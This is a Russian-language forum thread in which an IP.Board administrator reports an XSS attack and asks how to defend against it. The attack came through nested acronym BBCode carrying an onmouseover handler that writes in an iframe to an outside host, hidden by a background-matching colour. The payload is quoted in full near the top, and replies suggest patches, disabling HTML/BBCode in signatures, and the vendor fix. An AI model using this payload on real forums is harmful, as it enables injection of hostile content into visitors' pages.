Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
fagediba

Пытаются взломать что делать

Recommended Posts

Есть форум ipb

 

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

 

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

 

 

вот как работает тег акронима:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

 

Как защититься и что делать?

 

тема обсуждается тут

http://ipbskins.ru/forum/topic5228.html

http://forum.searchengines.ru/showthread.php?p=6476617

http://forum.antichat.ru/showthread.php?p=1960546

http://forums.ibresource.ru/index.php?showtopic=60138

Edited by fagediba

Share this post


Link to post
Share on other sites
Есть форум ipb

IP.Board версия: 1.x ?

 

Как защититься и что делать?

1. Использовать не ломанную версию форума со всеми патчами безопасности.

 

2. Разрешить HTML в сообщениях?

Если функция включена, то пользователи могут использовать HTML в личных сообщениях. Рекомендуем отключить данную функцию из соображений безопасности.

 

3. Разрешить HTML в подписи?

Разрешение данной функции НЕ рекомендуется, если вы не полностью доверяете пользователям, которым разрешено добавлять подпись.

Share this post


Link to post
Share on other sites

236 форум, хтмл теги атакующий не использовал

Share this post


Link to post
Share on other sites

Атакующий скрыл подпись под цвет фона

color="#EEF2F7"

 

Можно ли как-то запретить использовать в теге любые цвета? только те оставить, которые black, red и тд.?

 

Тогда левые скрипты на странице хотя бы будут видны

Share this post


Link to post
Share on other sites
тема обсуждается тут

Смысл так плодить тему....

 

К тому, что написал Ritsuka, добавить нечего.

 

+ жалоба в freehostia.com

Share this post


Link to post
Share on other sites

> К тому, что написал Ritsuka, добавить нечего.

 

ну запретил я акроним, запретил онмаузовер, и что, это остановит чтоли? значит используя другие теги построят свою конструкцию. Нужно чтобы грамотно кто-нибудь составил изменения в обработчик парсера

Share this post


Link to post
Share on other sites

bb- коды в подписях отключила...

Спасибо.

Share this post


Link to post
Share on other sites

Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим. Извиняюсь что расплодил код, сейчас его уже не убрать, я не думал что так сложно будет этому противодействовать

 

http://forums.ibresource.ru/index.php?showtopic=60138

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

Share this post


Link to post
Share on other sites
Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим.

Угу.

 

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

Разместил (ОН). Я читал молча, добавить было нечего

Share this post


Link to post
Share on other sites

Официальный фикс xss с акронимом в 2.3.6

 

Изменения

 

sources/classes/bbcode/class_bbcode_core.php

Edited by Ph-A
Код битый, нельзя использовать

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...